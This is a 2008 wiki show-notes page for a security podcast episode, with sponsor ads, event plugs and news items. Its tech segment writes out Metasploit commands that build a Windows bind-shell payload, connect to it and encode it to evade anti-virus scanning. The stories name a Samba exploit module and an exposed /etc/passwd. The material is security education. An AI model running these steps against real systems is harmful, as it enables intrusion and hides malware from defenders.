From Security Weekly Wiki
Jump to navigationJump to search


Core Security

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, worlds best penetration testing tool.

Tenable Network Security

This podcast is also sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notibly the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins, and compliance checks” Tenable – Unified Security Monitoring!


Astaro offers the most complete and easy to use Internet security appliances available. The products combine best of breed applications, the proven quality of Linux and enterprise level performance, providing the latest protection with the best total cost of ownership. All products are available as software, hardware or virtual appliances, which allows users the flexibility to meet a wide variety of deployment scenarios.

One of the best things about Astaro is that it offers its products completely free for home use. All enterprise features and all subscriptions, including virus scanning, web content filtering, email filtering and VPN clients, are available in the home license for no cost. All you have to do is visit www.astaro.com, register, download the software and obtain the key, which protects up to 10 IPs. There are no sales people to talk to, no payment information to enter—it’s just free. Again, visit www.astaro.com for more information or to download the product and free home user license.

Announcements & Shameless Plugs

Live from the PaulDotCom Studios Welcome to PaulDotCom Security Weekly, Episode 125 for September 30th, 2008

Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.

  • PaulDotCom SANS Click-Through - Go there, register for fabulous SANS training! Go now!
  • ICE (Integrated Cyber Exercise) - Oct. 1-3 at SANS Las Vegas! - Now featuring observers from the the Air Force Cyber Command (P), Air Force Information Operations Center and United States Air Force Warfare Center. Paul and Larry have Team names: The Steadfast Buccaneers and the The Network Ninja Assassins!
  • ChicagoCon - October 27 - November 1, Talks by Ed Skoudis, Gregory Conti West Point, Author of "Security Data Visualization", Daniel V. Hoffman CTO SMobile Systems, EH-Net Columnist, Billy Rios/John Walton Microsoft Pen Testers (Blue Hat)

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit 3.1-release Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

The above command produces a windows binary that listens on TCP port 6453 for a remote shell. You can access the remote shell using netcat as follows:

funnyhostname:~ pdc$ ncat 6453
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The payload generated above when uploaded to Virus Total only gets detected by 7 out of 36 anti-virus engines. If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:

"Reverse Engineering The Payload"

bash-3.2# strings payload.exe 
!This program cannot be run in DOS mode.
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

Editing msfpayload to change the version string:

if (cmd =~ /^x/)
                note =
                        "PaulDotCom's Evil Payload\n" +
                        "Payload: " + payload.refname + "\n" +
                        " Length: " + buf.length.to_s + "\n" +
                        "Options: " + options + "\n"

The payload generated above when uploaded to Virus Total only gets detected by 6 out of 36 anti-virus engines. (Panda anti-virus relied on the Metasploit payload string in the binary).

Pass #3 - Metasploit (svn version as of 9-28-08) Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe

The payload generated above when uploaded to Virus Total only gets detected by 4 out of 36 anti-virus engines. However, it does not function in my testing, but does show how we can evade anti-virus systems.

Stories Of Interest

Faking passports the THC way - [PauldotCom] - Talk about identity theft! Why do governments not learn that RFID is not secure? Its wireless all over again, transmitting in the clear and using poor encryption. The defense here, get an RF shielding wallet and/or case to keep your RF enabled stuff in. Like, your credit card... [Larry] - vonJeek modified RFIDiot to clone e-passports to a 72 K smart card with incorrect information. It works because the sanity checking is apparently broken.

Linksys WRT350N unauthorized access - [PaulDotCom] - So, this is perhaps one of the lamest vuln write-ups, but lets go through it anyway:

  • Router contains and "Outdated Samba 3.0.2, vulnerable to numerous security holes." Okay, well, that sucks (See metasploit for associated exploit, msf > use linux/samba/lsa_transnames_heap). Supposedly, there is no way to disable the samba server.
  • "Default admin:admin user" - This is the default on most routers, I beg and plead with vendors to allow the user to set the initial password, but it falls on deaf ears.
  • "Default open guest user, noway to disable it" - Hrm, I wonder two things, 1) what privs does the guest user get? 2) Why can't it be disabled!

HP Insight Diag remote exploit - [PaulDotCom] - I hate vuln write-ups that provide no information. This one in particular is scary, because where is InSight typically installed? On all your servers! So in one fell swoop I can pwn your server farm, and until you find a patch, there is no information for you to implement a workaround. Because you know, when a patch comes out for all of your servers, you don't take time to test it, you just blast it out, right? :) [Larry] - Not a lot of detail here, except that a "ential security vulnerability has been identified with HP Insight Diagnostics . The vulnerability could be remotely exploited to gain unauthorized access to files." In fact the referenced CVE has even less info!

Indirect iPhone forensics - [PaulDotCom] - I filed this in the category of "Neat!". In the backup files for your iPhone, you can extract the text messages. Sometimes you can find good stuff in text messages, like passwords and phone numbers, and this method is way better than trying to sniff them off the wire, which is illegal.

Rooting Phillips - [PaulDotCom] - While it doesn't give you access to /etc/shadow, here is a vulnerability in a web application that gives anyone on the internet access to /etc/passwd on the web server. This is totally awesome! Oh wait, we really should give the company a chance (and the vendor) to patch it first, right? [Larry] - Wow, stupid configuration issues, allow directory traversal attacks on a Phillips website